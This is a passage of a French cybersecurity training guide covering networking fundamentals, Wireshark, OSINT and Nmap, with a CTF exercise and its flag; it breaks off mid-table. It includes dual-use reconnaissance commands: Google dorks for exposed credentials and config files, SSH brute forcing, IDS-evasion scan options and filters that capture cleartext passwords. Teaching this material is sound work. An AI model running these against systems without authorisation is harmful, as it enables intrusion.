CYBERSECURITE - GUIDE COMPLET
CYBERSECURITE
Guide Complet — De Zero a Expert
[ Securite Reseau & Defense ]
[ Hacking Ethique & Pentest ]
[ Preparation aux CTF ]
10 Modules Progressifs | Theorie + Pratique + CTF | 100+ Commandes
01 Fondations du Reseau 02 Reconnaissance & OSINT
03 Securite des Protocoles 04 Analyse de Vulnerabilites
05 Exploitation & Post-Exploitation 06 Securite Web
07 Cryptographie Appliquee 08 Forensique & Reponse Incident
09 Hardening & Defense Active 10 Strategies CTF & Methodologie
AVERTISSEMENT LEGAL : Ce document est destine exclusivement a des fins educatives et pedagogiques. Toutes les techniques
presentees doivent etre pratiquees uniquement sur des systemes vous appartenant ou pour lesquels vous disposez d'une
autorisation ecrite explicite. Tout acces non autorise a un systeme informatique est un delit penal. L'auteur decline toute
responsabilite en cas d'utilisation malveillante de ces informations.
-1-
CYBERSECURITE - GUIDE COMPLET
TABLE DES MATIERES
01 Les Fondations du Reseau
■ 1.1 Modele OSI en 7 couches
■ 1.2 Modele TCP/IP operationnel
■ 1.3 TCP — flags, handshake, structure
■ 1.4 UDP — comparatif TCP
■ 1.5 ICMP — types et usage
■ 1.6 Ports et protocoles essentiels (23 entries)
■ 1.7 Adressage IPv4 et subnetting
■ 1.8 ARP — resolution d'adresses
■ 1.9 DNS — types d'enregistrements
■ 1.10 Wireshark — reference complete
02 Reconnaissance & OSINT
■ 2.1 Phases du pentest
■ 2.2 Reconnaissance passive — Google Dorks, WHOIS, DNS
■ 2.3 Nmap — tous les types de scans, NSE, outputs
03 Securite des Protocoles
■ 3.1 ARP Poisoning — attaque et contre-mesures
■ 3.2 DNS — attaques et enumeration
■ 3.3 SMB — EternalBlue, Responder, Pass-the-Hash
■ 3.4 SSL/TLS — configuration et tests
04 Analyse de Vulnerabilites
■ 4.1 CVE, CWE, CVSS v3.1
■ 4.2 Searchsploit et ExploitDB
■ 4.3 OpenVAS — installation et workflow
■ 4.4 Validation manuelle des resultats
05 Exploitation & Post-Exploitation
■ 5.1 Metasploit — architecture complete
■ 5.2 Meterpreter — reference complete
■ 5.3 Pivoting — 3 methodes (autoroute, SSH, Chisel)
06 Securite des Applications Web
■ 6.1 OWASP Top 10 2021
■ 6.2 SQL Injection — de la base a l'avance
■ 6.3 XSS — tous les types
■ 6.4 Burp Suite — guide complet, ffuf, gobuster
07 Cryptographie Appliquee
■ 7.1 Chiffrement symetrique — algorithmes et modes
■ 7.2 RSA, ECDSA, PKI, openssl
■ 7.3 Techniques CTF crypto
08 Forensique & Reponse a Incident
■ 8.1 Ordre de volatilite et acquisition
■ 8.2 Volatility 3 — reference complete
■ 8.3 Artefacts Windows forensiques
■ 8.4 Analyse logs et malware statique
-2-
CYBERSECURITE - GUIDE COMPLET
09 Hardening & Defense Active
■ 9.1 CIS Benchmarks Linux — Lynis, SSH, Fail2Ban
■ 9.2 iptables et nftables
■ 9.3 Suricata IDS/IPS — regles et detection
10 Strategies CTF & Methodologie Pentest
■ 10.1 Methodologie PTES complete
■ 10.2 Structure rapport pentest
■ 10.3 Strategies CTF par categorie
■ 10.4 Lab personnel + plateformes
■ 10.5 Certifications recommandees
-3-
CYBERSECURITE - GUIDE COMPLET
-4-
CYBERSECURITE - GUIDE COMPLET
MODULE 01
Les Fondations du Reseau
Avant d'attaquer ou de defendre un systeme, il faut comprendre parfaitement les rouages du reseau.
Ce module pose les bases indispensables : modeles de reference, protocoles essentiels, adressage
IP, et prise en main de Wireshark.
OBJECTIFS DU MODULE
✓ Maitriser le modele OSI (7 couches) et TCP/IP (4 couches)
✓ Comprendre l'encapsulation et la decapsulation des donnees
✓ Identifier les protocoles reseau critiques et leurs ports
✓ Comprendre le fonctionnement de TCP, UDP, ICMP en detail
✓ Maitriser l'adressage IPv4/IPv6 et le subnetting
✓ Utiliser Wireshark pour capturer et analyser le trafic en temps reel
✓ Appliquer les filtres Wireshark pour isoler les flux suspects
1.1 Le Modele OSI — Architecture en 7 Couches
Le modele OSI (Open Systems Interconnection), publie par l'ISO en 1984, est le cadre conceptuel universel qui
decrit comment deux systemes communiquent a travers un reseau. Chaque couche a un role precis et ne
communique qu'avec la couche immediatement superieure ou inferieure. En securite, identifier la couche
concernee par une attaque oriente immediatement la strategie de defense.
Couche Nom Protocoles / Exemples Attaques associees
7 Application HTTP/S, FTP, DNS, SMTP, SNMP, SSH Injection SQLi, XSS, MITM applicatif
6 Presentation TLS/SSL, JPEG, MIME, ASN.1 SSL Stripping, downgrade TLS
5 Session NetBIOS, RPC, SMB, NFS Session Hijacking, replay
4 Transport TCP, UDP, SCTP SYN Flood, Port Scan, hijacking
3 Reseau IP, ICMP, OSPF, BGP, ARP* IP Spoofing, ICMP Flood, routing
2 Liaison Ethernet, Wi-Fi 802.11, ARP, PPP ARP Spoofing, MAC Flooding
1 Physique RJ45, Fibre optique, Wi-Fi RF Wiretapping, jamming RF
Encapsulation — Comment les donnees voyagent
Lors de l'envoi, chaque couche AJOUTE un en-tete (et parfois un pied) : c'est l'encapsulation.
Couche 7 : Message (donnees brutes de l'application)
Couche 4 : Segment TCP/UDP = en-tete transport + message
-5-
CYBERSECURITE - GUIDE COMPLET
Couche 3 : Paquet IP = en-tete IP + segment
Couche 2 : Trame Ethernet = en-tete MAC + paquet IP + FCS
Couche 1 : Bits transmis sur le support physique
A la reception, chaque couche RETIRE son en-tete (decapsulation) jusqu'aux donnees originales.
1.2 Le Modele TCP/IP — Le Modele Operationnel
Le modele TCP/IP, developpe par DARPA dans les annees 1970, est le modele utilise par l'Internet et tous les
reseaux modernes. Il simplifie l'OSI en 4 couches fonctionnelles. C'est LE modele de reference pour
comprendre les attaques reelles.
Couche TCP/IP Equivalence OSI Protocoles cles PDU (unite de donnees)
Application 7+6+5 HTTP, DNS, FTP, SSH, SMTP, SNMP, DHCPMessage / Donnees
Transport 4 TCP (fiable), UDP (rapide) Segment (TCP) / Datagramme (UDP)
Internet 3 IP v4/v6, ICMP, IGMP, ARP Paquet
Acces reseau 2+1 Ethernet, Wi-Fi, PPP, Frame Relay Trame / Bits
1.3 Protocole TCP — Fiabilite et Controle de Flux
TCP (Transmission Control Protocol) garantit la livraison ordonnee et sans erreur des donnees. Il etablit une
connexion via le three-way handshake et la termine via un four-way teardown. Chaque segment TCP contient
des flags qui controlent l'etat de la connexion — la connaissance de ces flags est fondamentale pour
comprendre les scans Nmap et les attaques reseau.
Flags TCP et leur signification :
Flag Nom Usage normal Utilisation offensive
SYN Synchronize Initier une connexion SYN Scan (Nmap -sS), SYN Flood
ACK Acknowledge Accuser reception d'un segment ACK Scan pour detecter firewalls
FIN Finish Terminer la connexion proprement FIN Scan furtif (Nmap -sF)
RST Reset Interrompre une connexion abruptement RST injection pour couper sessions
PSH Push Forcer la transmission immediate Manipulation de buffers
URG Urgent Donnees urgentes en priorite Rarement utilise en attaque
ECE ECN-Echo Signalement congestion reseau Fingerprinting OS
CWR Congestion Window Reduced notification Fingerprinting OS
Three-Way Handshake et Four-Way Teardown :
# === THREE-WAY HANDSHAKE (etablissement connexion) ===
Client --[SYN, SEQ=1000]-----------> Serveur # Client initie
Client <-[SYN-ACK, SEQ=2000,ACK=1001]- Serveur # Serveur accepte + sync
-6-
CYBERSECURITE - GUIDE COMPLET
Client --[ACK, ACK=2001]------------> Serveur # Confirmation -> connexion etablie
# === TRANSFERT DE DONNEES ===
Client --[PSH-ACK, SEQ=1001, data]---> Serveur # Envoi donnees
Client <-[ACK=1001+len(data)]---------- Serveur # Accusé reception
# === FOUR-WAY TEARDOWN (fermeture connexion) ===
Client --[FIN-ACK]-----> Serveur # Client veut fermer
Client <-[ACK]----------- Serveur # Serveur accuse
Client <-[FIN-ACK]------- Serveur # Serveur veut fermer aussi
Client --[ACK]----------> Serveur # Client confirme -> connexion fermee
Structure d'un en-tete TCP (20 octets minimum) :
Champ Taille (bits) Description
Source Port 16 Port source (1-65535)
Destination Port 16 Port destination
Sequence Number 32 Numero de sequence du 1er octet de donnees
Acknowledgment Nb 32 Prochain octet attendu de l'autre cote
Data Offset 4 Taille de l'en-tete (x4 octets)
Reserved 3 Reserve pour usage futur
Flags 9 NS CWR ECE URG ACK PSH RST SYN FIN
Window Size 16 Fenetre de reception (controle de flux)
Checksum 16 Verification d'integrite de l'en-tete + donnees
Urgent Pointer 16 Si URG=1, pointe vers donnees urgentes
Options 0-320 MSS, SACK, Timestamps, Window Scaling
1.4 Protocole UDP — Rapidite sans Garantie
UDP (User Datagram Protocol) est un protocole sans connexion et sans garantie de livraison. Il sacrifie la
fiabilite au profit de la vitesse et de la faible latence. Utilise pour DNS, VoIP, jeux en ligne, streaming, et de
nombreux protocoles de gestion reseau. En pentest, les ports UDP sont souvent negliges mais peuvent cacher
des services critiques.
Aspect TCP UDP
Connexion Oui (3-way handshake) Non (connectionless)
Garantie livraison Oui (retransmission) Non
Ordre des paquets Garanti (SEQ numbers) Non garanti
Controle de flux Oui (window size) Non
En-tete 20+ octets 8 octets (leger)
-7-
CYBERSECURITE - GUIDE COMPLET
Vitesse Plus lent (overhead) Plus rapide
Usage HTTP, FTP, SSH, SMTP DNS, DHCP, VoIP, SNMP
Scan Nmap -sT (connect) ou -sS (SYN) -sU (scan UDP)
Ports UDP critiques a scanner
53 - DNS : transferts de zone, DNS tunneling possible
67 - DHCP : DHCP starvation, Rogue DHCP server
69 - TFTP : transfert de fichiers non authentifie
123 - NTP : amplification DDoS, NTP reflection
161 - SNMP v1/v2: community string en clair, information disclosure
500 - IKE : VPN IPSec, fingerprinting de configuration
1194 - OpenVPN : si mal configure, peut fuiter des infos
Commande : nmap -sU --top-ports 100 -T4
1.5 ICMP — Messages de Controle et Diagnostic
ICMP (Internet Control Message Protocol) est utilise pour diagnostiquer les problemes de connectivite reseau
(ping, traceroute) et transmettre des messages d'erreur. Bien qu'essentiel, ICMP est aussi un vecteur d'attaque
et de reconnaissance.
Type ICMP Code Signification Usage securite
0 0 Echo Reply (reponse ping) Decouverte d'hotes actifs
3 0-15 Destination Unreachable Cartographie reseau (firewall ACKs)
5 0-3 Redirect ICMP Redirect Attack (poisoning routage)
8 0 Echo Request (ping) Host discovery, ICMP Flood
11 0 Time Exceeded (TTL=0) Traceroute, mapping topologie
13 0 Timestamp Request Fingerprinting OS via timing
30 - Traceroute (obsolete) Utilise par certains outils
# Ping basique (envoyer 4 requetes ICMP Echo)
ping -c 4 [Link]
# Traceroute — cartographier le chemin reseau
traceroute [Link] # Linux (UDP par defaut)
traceroute -I [Link] # Linux avec ICMP
traceroute -T -p 80 [Link] # TCP traceroute (passe souvent les firewalls)
# Ping sweep — decouvrir les hotes actifs d'un subnet
fping -a -g [Link]/24 2>/dev/null
-8-
CYBERSECURITE - GUIDE COMPLET
# Nmap host discovery (sans scan de port)
nmap -sn [Link]/24 # Ping scan (ICMP + ARP)
nmap -sn -PE [Link]/24 # ICMP Echo uniquement
nmap -sn -PP [Link]/24 # ICMP Timestamp
1.6 Protocoles Essentiels et leurs Ports
Connaitre les ports associes a chaque protocole est fondamental : cela permet d'interpreter les resultats de
scan Nmap, de configurer des regles de firewall, et d'identifier immediatement les services exposes
potentiellement vulnerables.
Port(s) Protocole Description Risques / Remarques
20/21 FTP Transfert de fichiers Credentials en clair, anonymous login
22 SSH Shell securise, tunneling Brute force, cles faibles, CVEs
23 Telnet Shell non chiffre (obsolete) Capture triviale des credentials
25 SMTP Envoi d'emails Open relay, spam, phishing
53 DNS Resolution de noms Zone transfer, DNS tunneling
67/68 DHCP Attribution IP automatique Rogue DHCP, starvation
80 HTTP Web non chiffre Capture des donnees, injection
110 POP3 Reception emails (non chiffre) Credentials en clair
111 RPC Remote Procedure Call Enumeration, exploitation RPC
135 MSRPC RPC Windows Nombreuses CVEs historiques
137-139 NetBIOS Partage Windows legacy Enumeration, NTLM capture
143 IMAP Emails (non chiffre) Credentials en clair
161/162 SNMP Supervision reseau Community 'public', info disclosure
389 LDAP Annuaire (Active Directory) Enumeration utilisateurs AD
443 HTTPS Web chiffre TLS Mauvaise config TLS, cert invalide
445 SMB Partage fichiers Windows EternalBlue, Pass-the-Hash
1433 MSSQL Base de donnees Microsoft SQL SA par defaut, xp_cmdshell
3306 MySQL Base de donnees MySQL Root sans password, SQLi
3389 RDP Bureau a distance Windows BlueKeep, brute force, MITM
5985/86 WinRM Windows Remote Management Acces distant PS, pivoting
6379 Redis Base NoSQL en memoire Acces sans auth frequent
8080 HTTP-alt Proxy, applis web alternatives Memes risques qu'HTTP
27017 MongoDB Base NoSQL Acces sans auth frequent
-9-
CYBERSECURITE - GUIDE COMPLET
1.7 Adressage IPv4 et Subnetting
Une adresse IPv4 est composee de 32 bits (4 octets) en notation pointee decimale. Le subnetting divise un
reseau en sous-reseaux pour optimiser l'adressage et segmenter le trafic. En pentest, comprendre le subnetting
permet d'identifier la portee exacte d'une cible et de planner les pivots reseau.
Classe 1er octet Plage d'adresses Masque par defaut Nb d'hotes
A 1-126 [Link] - [Link] /8 ([Link]) 16 777 214
B 128-191 [Link] - [Link] /16 ([Link]) 65 534
C 192-223 [Link] - [Link] /24 ([Link]) 254
D 224-239 [Link] - [Link] Multicast N/A
E 240-255 [Link] - [Link] Experimental N/A
Plages d'adresses privees (RFC 1918) :
Plage prive Notation CIDR Usage typique
[Link] - [Link] /8 Grands reseaux d'entreprise
[Link] - [Link] /12 Moyennes entreprises
[Link] - [Link] /16 Reseaux domestiques, PME
[Link] - [Link] /8 Loopback (communication locale)
[Link] - [Link] /16 APIPA (DHCP echoue)
Calcul de sous-reseau — Exemples pratiques :
# Calculer les infos d'un sous-reseau avec ipcalc
ipcalc [Link]/24
Network: [Link]/24
Broadcast: [Link]
HostMin: [Link]
HostMax: [Link]
Hosts/Net: 254
ipcalc [Link]/22
Network: [Link]/22
Broadcast: [Link]
HostMin: [Link]
HostMax: [Link]
Hosts/Net: 1022
# Table de reference rapide CIDR
/24 = 254 hotes /25 = 126 /26 = 62 /27 = 30
/28 = 14 hotes /29 = 6 /30 = 2 /32 = 1 hote (host route)
- 10 -
CYBERSECURITE - GUIDE COMPLET
# Convertir IP en binaire (Python)
python3 -c "import ipaddress; print(bin(int(ipaddress.IPv4Address('[Link]'))))"
1.8 ARP — Resolution d'Adresses MAC
ARP (Address Resolution Protocol) traduit une adresse IP en adresse MAC sur un reseau local. Sans
mecanisme d'authentification, il est naturellement vulnerable au poisoning. C'est la base de nombreuses
attaques MITM sur LAN.
# Afficher la table ARP locale
arp -n # Linux
arp -a # Windows
ip neigh show # Linux moderne
# Envoyer une requete ARP manuellement (arping)
arping -I eth0 [Link]
arping -c 3 -I eth0 [Link]
# Nmap ARP discovery (le plus rapide sur LAN)
nmap -sn -PR [Link]/24 # -PR = ARP Ping
nmap -sn --send-ip [Link]/24 # Forcer IP (pas ARP) pour bypasser
# Verifier si une IP repond en ARP (detection hote)
arp-scan --interface=eth0 [Link]/24
arp-scan -l # Scanner tout le reseau local
1.9 DNS — Anatomie du Systeme de Noms
Le DNS (Domain Name System) est l'annuaire de l'Internet. Il traduit les noms de domaine en adresses IP. Sa
hierarchie distribuee et l'absence d'authentification native (avant DNSSEC) en font un protocole critique a
maitriser.
Type d'enregistrement
Description Exemple
A Adresse IPv4 du domaine [Link] -> [Link]
AAAA Adresse IPv6 du domaine [Link] -> 2606:2800::1
CNAME Alias vers un autre nom www -> [Link]
MX Serveur de messagerie 10 [Link]
NS Serveur de noms autoritaire [Link]
TXT Texte libre (SPF, DKIM, verification) v=spf1 include:... -all
PTR Reverse DNS (IP -> nom) [Link].[Link]
SOA Start of Authority (meta-zone) Numero de serie, TTL...
SRV Service locator _ldap._tcp.[Link]
CAA Autorites de certification autorisees 0 issue '[Link]'
- 11 -
CYBERSECURITE - GUIDE COMPLET
# Requetes DNS avec dig — l'outil de reference
dig [Link] A # Enregistrement A (IPv4)
dig [Link] AAAA # Enregistrement AAAA (IPv6)
dig [Link] MX # Serveurs mail
dig [Link] NS # Serveurs DNS
dig [Link] TXT # Enregistrements TXT (SPF, DKIM...)
dig [Link] ANY # Tous les types (souvent bloque)
# Requete vers un serveur DNS specifique
dig @[Link] [Link] A # Utiliser Google DNS
dig @[Link] [Link] A # Utiliser Cloudflare DNS
# Reverse DNS (IP vers nom)
dig -x [Link]
host [Link]
# Test de Zone Transfer AXFR (si mal configure = vuln critique)
dig axfr @[Link] [Link]
host -l [Link] [Link]
# Traces DNS complet (debug)
dig +trace [Link]
# Verifier DNSSEC
dig +dnssec [Link] # Chercher les flags AD, DO
delv @[Link] +rtrace [Link]
1.10 Wireshark — Analyse de Protocoles en Profondeur
Wireshark est l'analyseur de protocoles reseau de reference. Il capture les paquets en temps reel sur les
interfaces reseau et permet de dissequer chaque couche du modele OSI. Indispensable pour le debug reseau,
l'analyse forensique et la comprehension des attaques.
Installation et premiere capture :
# Installation
sudo apt install wireshark tshark -y
sudo usermod -aG wireshark $USER # Permettre la capture sans root
# Lister les interfaces disponibles
wireshark -D
tshark -D
ip link show
# Lancer une capture sur eth0
- 12 -
CYBERSECURITE - GUIDE COMPLET
sudo wireshark -i eth0 & # Interface graphique
sudo tshark -i eth0 # Ligne de commande
# Capturer et sauvegarder dans un fichier pcap
sudo tshark -i eth0 -w [Link]
sudo tcpdump -i eth0 -w [Link]
# Lire un fichier pcap existant
wireshark [Link]
tshark -r [Link]
Filtres de capture (Berkeley Packet Filter - BPF) :
Les filtres BPF s'appliquent AVANT la capture (niveau kernel) — ils reduisent le volume de donnees collectees.
A distinguer des filtres d'affichage Wireshark appliques APRES.
# Filtres BPF (capture) — syntaxe tcpdump/Wireshark
sudo tshark -i eth0 -f 'host [Link]'
sudo tshark -i eth0 -f 'port 80'
sudo tshark -i eth0 -f 'tcp port 443'
sudo tshark -i eth0 -f 'not arp and not icmp'
sudo tshark -i eth0 -f 'net [Link]/24'
sudo tshark -i eth0 -f 'port 80 or port 443'
sudo tshark -i eth0 -f 'tcp[tcpflags] & tcp-syn != 0' # SYN uniquement
sudo tshark -i eth0 -f 'icmp[icmptype] == 8' # ICMP Echo Request
Filtres d'affichage Wireshark (les plus utiles) :
Filtre d'affichage Ce qu'il isole
tcp Tout le trafic TCP
udp Tout le trafic UDP
icmp Tous les paquets ICMP
dns Requetes et reponses DNS
http Trafic HTTP (port 80)
tls / ssl Trafic TLS/SSL (HTTPS, etc.)
[Link] == [Link] Tout trafic vers OU depuis cette IP
[Link] == [Link] Paquets envoyes par cette IP seulement
[Link] == [Link] Paquets a destination de cette IP
[Link] == 8080 Trafic TCP sur le port 8080
[Link] == 443 Connexions HTTPS sortantes
[Link] == 1 && [Link] == 0 SYN seuls (nouvelles connexions)
- 13 -
CYBERSECURITE - GUIDE COMPLET
[Link] == 1 Paquets RST (connexions interrompues)
[Link] == "POST" Formulaires soumis (credentials !)
[Link] == 200 Reponses HTTP OK
[Link] >= 400 Erreurs HTTP (400, 404, 500...)
[Link] == "PASS" Mots de passe FTP en clair
[Link] Auth SMTP (credentials)
[Link] contains "google" Requetes DNS contenant 'google'
[Link] > 1400 Paquets proches de la MTU (1500 oct)
!(arp or icmp or dns) Exclure le bruit (ARP, ping, DNS)
[Link] < 5 TTL faible = probablement un traceroute
tcp contains "password" Mot 'password' dans le payload TCP
Fonctionnalites avancees de Wireshark :
# === SUIVRE UN FLUX COMPLET ===
# Clic droit sur un paquet -> Follow -> TCP Stream
# Affiche la conversation complete en clair
# === STATISTIQUES ===
# Statistics -> Conversations : tous les flux actifs
# Statistics -> Protocol Hierarchy : repartition des protocoles
# Statistics -> IO Graphs : debit dans le temps
# Statistics -> Endpoints : tous les hotes detectes
# === EXPORTER DES OBJETS (fichiers transfères) ===
# File -> Export Objects -> HTTP (recuperer fichiers HTTP)
# File -> Export Objects -> FTP-DATA
# File -> Export Objects -> SMB
# === DECHIFFRER TLS (si on a la cle privee ou SSLKEYLOGFILE) ===
# Edit -> Preferences -> Protocols -> TLS
# Ajouter la cle privee RSA du serveur (format PEM)
# OU pointer vers SSLKEYLOGFILE (variable d'env Firefox/Chrome)
export SSLKEYLOGFILE=~/ssl_keys.log
firefox & # Les cles de session sont loggees automatiquement
# === TSHARK EN LIGNE DE COMMANDE ===
tshark -r [Link] -T fields -e [Link] -e [Link] -e [Link]
tshark -r [Link] -Y '[Link] == "POST"' -V
tshark -r [Link] -qz io,phs # Hierarchie des protocoles
- 14 -
CYBERSECURITE - GUIDE COMPLET
tshark -r [Link] -qz conv,tcp # Conversations TCP
Raccourcis Wireshark indispensables
Ctrl+F : Rechercher dans les paquets
Ctrl+G : Aller a un numero de paquet specifique
Ctrl+E : Exporter les objets HTTP/FTP/SMB
Ctrl+Shift+E : Exporter des paquets selectionnes
Ctrl+Alt+Shift+T : Suivre le flux TCP
Colorer regles -> View -> Coloring Rules (personnaliser la colorisation)
Mark packet : Ctrl+M (pour marquer des paquets importants)
CTF #01 - Le Paquet Mystérieux
Scenario
Un administrateur systeme vous contacte : des donnees sensibles semblent avoir ete exfiltrees depuis le
serveur FTP de son entreprise. Il vous fournit un fichier '[Link]' enregistre pendant l'incident. Votre
mission : analyser le trafic, identifier le protocole d'exfiltration, retrouver les credentials utilises et extraire le
fichier transmis.
Objectifs
[1] Ouvrir le fichier [Link] avec Wireshark
[2] Identifier les protocoles presents (Statistics -> Protocol Hierarchy)
[3] Filtrer le trafic FTP et suivre le flux de controle (port 21)
[4] Extraire les credentials FTP (USER et PASS en clair)
[5] Exporter le fichier transfere via File -> Export Objects -> FTP-DATA
[6] Lire le contenu du fichier pour trouver le flag
Outils suggeres
Wireshark (interface graphique)
tshark -r [Link] -Y ftp -T fields -e [Link] -e [Link]
tshark -r [Link] -Y ftp-data
Indice
Utilisez le filtre 'ftp' pour voir les commandes, puis 'ftp-data' pour les donnees. Export Objects -> FTP-DATA
extrait automatiquement les fichiers.
Format du flag
CTF{ftp_cr3d3nt14ls_4nd_d4t4_3xf1ltr4t1on_d3t3ct3d}
- 15 -
CYBERSECURITE - GUIDE COMPLET
MODULE 02
Reconnaissance & OSINT
La reconnaissance est la phase la plus critique d'un pentest. Plus l'information collectee est precise,
plus les phases suivantes seront efficaces. Ce module couvre toutes les techniques passives et
actives pour cartographier une cible.
OBJECTIFS DU MODULE
✓ Distinguer reconnaissance passive (OSINT) et active (interaction directe)
✓ Maitriser les Google Dorks pour extraire des informations publiques
✓ Utiliser Nmap avec toutes ses options pour cartographier un reseau
✓ Enumerer les sous-domaines et la surface d'attaque DNS
✓ Exploiter Shodan, Censys et TheHarvester
✓ Comprendre le footprinting d'une organisation cible
2.1 Phases du Pentest — Vue d'Ensemble
Phase Nom Description Outils cles
1 Pre-engagement Contrat, scope, RoE, autorisation legale Documents, templates
2 Reconnaissance Collecte d'infos passive et active OSINT, Nmap, Shodan
3 Enumeration Services, versions, users, shares Nmap -sV, enum4linux
4 Analyse de vuln. Identification et priorisation des failles Nessus, OpenVAS
5 Exploitation Compromission des systemes cibles Metasploit, Exploits
6 Post-exploitation Pivot, persistence, exfiltration Meterpreter, Empire
7 Rapport Documentation complete des findings Dradis, PlexTrac
2.2 Reconnaissance Passive — OSINT
La reconnaissance passive ne genere aucune interaction directe avec la cible. Elle exploite exclusivement les
sources d'information publiquement disponibles. Legale dans la quasi-totalite des cas, elle peut fournir des
informations extremement sensibles sur l'organisation cible.
Google Dorking — Operateurs avances :
Operateur Syntaxe Exemple d'usage
site: site:[Link] Limiter la recherche a un domaine
filetype: filetype:pdf site:[Link] Fichiers PDF publics sur le domaine
- 16 -
CYBERSECURITE - GUIDE COMPLET
inurl: inurl:admin site:[Link] Pages dont l'URL contient 'admin'
intext: intext:"mot de passe" site:... Pages contenant ce texte
intitle: intitle:"index of" /backup Titre de page specific
cache: cache:[Link] Version en cache de Google
link: link:[Link] Pages qui pointent vers ce domaine
"..." "phrase exacte" Recherche de phrase exacte
-mot -login site:[Link] Exclure les pages contenant ce mot
OR site:[Link] OR site:[Link] Plusieurs domaines
# === GOOGLE DORKS PENTEST ESSENTIELS ===
# Fichiers de configuration et credentials exposes
site:[Link] filetype:env
site:[Link] filetype:cfg OR filetype:conf OR filetype:ini
site:[Link] filetype:xml intext:password
site:[Link] "DB_PASSWORD" OR "database_password"
# Repertoires indexés (directory listing)
intitle:"index of" site:[Link]
intitle:"index of" /backup site:[Link]
intitle:"index of" site:[Link] "parent directory"
# Panneaux d'administration
site:[Link] inurl:admin OR inurl:administrator OR inurl:login
site:[Link] inurl:phpmyadmin OR inurl:wp-admin OR inurl:cpanel
# Fichiers sensibles
site:[Link] filetype:sql
site:[Link] filetype:log
site:[Link] filetype:bak OR filetype:backup OR filetype:old
# Cameras et appareils IoT (Shodan est mieux pour ca)
inurl:"/view/[Link]"
intitle:"webcamXP 5" inurl:8080
# Endpoints API exposes
site:[Link] inurl:api
site:[Link] inurl:swagger OR inurl:api-docs
Enumeration DNS — Cartographie de la surface d'attaque :
# Enumeration DNS passive avec fierce
fierce --domain [Link]
- 17 -
CYBERSECURITE - GUIDE COMPLET
# Enumeration de sous-domaines avec amass (OSINT)
amass enum -passive -d [Link]
amass enum -active -d [Link] -brute
# Subfinder — enumeration rapide via sources OSINT
subfinder -d [Link] -silent
subfinder -d [Link] -o [Link]
# Brute force de sous-domaines avec gobuster
gobuster dns -d [Link] -w
/usr/share/wordlists/seclists/Discovery/DNS/[Link]
# Test de Zone Transfer (AXFR) - critique si non protege
dig axfr @[Link] [Link]
dnsrecon -d [Link] -t axfr
# Enumeration complete avec dnsrecon
dnsrecon -d [Link] -t std # Enregistrements standards
dnsrecon -d [Link] -t brt # Brute force sous-domaines
dnsrecon -d [Link] -t goo # Recherche Google
# theHarvester — emails, sous-domaines, IPs, URLs
theHarvester -d [Link] -l 500 -b all
theHarvester -d [Link] -b google,bing,linkedin,shodan
WHOIS et informations d'enregistrement :
# WHOIS d'un domaine
whois [Link]
whois -h [Link] [Link]
# Informations extraites : Registrant name/org/email, dates
# creation/expiration, serveurs DNS, registrar
# Reverse WHOIS — tous les domaines du meme registrant
# Utiliser [Link] ou [Link]
# ASN lookup — identifier les blocs IP d'une organisation
whois -h [Link] -- '-i origin AS15169' # Google
curl -s [Link] | jq .prefixes
# Shodan — appareils connectes indexes
shodan search 'org:"Target Company" port:22'
shodan search '[Link]:[Link]'
shodan host [Link]
# Censys — alternative a Shodan
- 18 -
CYBERSECURITE - GUIDE COMPLET
curl '[Link]
2.3 Nmap — Reference Complète
Nmap (Network Mapper) est l'outil de scan reseau le plus utilise en securite offensive et defensive. Sa
puissance vient de la combinaison de techniques de scan variees, de la detection de services et d'OS, et du
Nmap Scripting Engine (NSE).
Types de scans et leurs caracteristiques :
Option Nmap Nom du scan Fonctionnement Privilege requis
-sT TCP Connect Connexion TCP complete (3-way HS) Utilisateur
-sS SYN Stealth Envoie SYN, attend SYN-ACK, envoie RST Root/Admin
-sU UDP Scan Envoie paquet UDP vide, analyse reponse Root/Admin
-sF FIN Scan Envoie FIN, port ferme -> RST, ouvert -> rien Root/Admin
-sX Xmas Scan Flags FIN+PSH+URG allumes (comme sapin Noel)
Root/Admin
-sN Null Scan Aucun flag - meme principe que FIN Root/Admin
-sA ACK Scan Detecte firewalls et regles de filtrage Root/Admin
-sW Window Scan Variante ACK, analyse TCP window size Root/Admin
-sI Idle/Zombie Scan Utilise un hote tiers comme relais Root/Admin
-sO IP Protocol Scan Detecte protocoles IP supportes (IP, TCP, UDP) Root/Admin
# === SCAN DE BASE — DECOUVERTE ===
nmap [Link]/24 # Scan ping + ports courants
nmap -sn [Link]/24 # Decouverte hotes uniquement (ping scan)
nmap -Pn [Link] # Ne pas pinger (bypass firewall ICMP)
# === SCAN DE PORTS ===
nmap -p 80,443,8080 [Link] # Ports specifiques
nmap -p- [Link] # TOUS les ports (1-65535)
nmap -p 1-1024 [Link] # Plage de ports
nmap --top-ports 1000 [Link] # Top 1000 ports les plus courants
nmap --top-ports 100 -sU [Link] # Top 100 UDP
# === DETECTION DE SERVICES ET OS ===
nmap -sV [Link] # Detection des versions de services
nmap -sV --version-intensity 9 [Link] # Detection maximale
nmap -O [Link] # Detection OS (necessite root)
nmap -A [Link] # Tout : OS + version + scripts + traceroute
# === TIMING (T0 = lent/furtif -> T5 = ultra rapide) ===
nmap -T0 [Link] # Paranoiaque (IDS evasion)
- 19 -
CYBERSECURITE - GUIDE COMPLET
nmap -T1 [Link] # Furtif
nmap -T2 [Link] # Poli
nmap -T3 [Link] # Normal (defaut)
nmap -T4 [Link] # Agressif (recommande en lab)
nmap -T5 [Link] # Insane (risque de rater des ports)
# === NMAP SCRIPTING ENGINE (NSE) ===
nmap -sC [Link] # Scripts par defaut
nmap --script=default [Link] # Equivalent -sC
nmap --script vuln [Link] # Scanner les vulnerabilites
nmap --script smb-vuln-ms17-010 -p 445 [Link] # EternalBlue
nmap --script http-enum -p 80,443 [Link] # Enum web
nmap --script ftp-anon -p 21 [Link] # FTP anonyme
nmap --script ssh-brute -p 22 [Link] # Brute SSH
nmap --script dns-brute --script-args [Link]=[Link]
# === SCAN COMPLET RECOMMANDE EN PENTEST ===
nmap -sV -O -sC -p- -T4 [Link] -oA scan_complet
# -oA : sorties en 3 formats (normal, XML, grepable)
# === OUTPUT ===
nmap ... -oN [Link] # Format texte normal
nmap ... -oX [Link] # Format XML (importable Metasploit)
nmap ... -oG [Link] # Format grepable
nmap ... -oA nom_base # Les 3 formats simultanément
# === EVASION IDS / FIREWALL ===
nmap -f [Link] # Fragmentation des paquets
nmap -D RND:10 [Link] # Decoys (leurres IP aleatoires)
nmap --source-port 53 [Link] # Utiliser port source 53 (DNS)
nmap --data-length 25 [Link] # Ajouter padding aleatoire
nmap -sI zombie_host [Link] # Idle scan (via zombie)
Analyse des resultats Nmap — Etats des ports :
Etat Signification Action
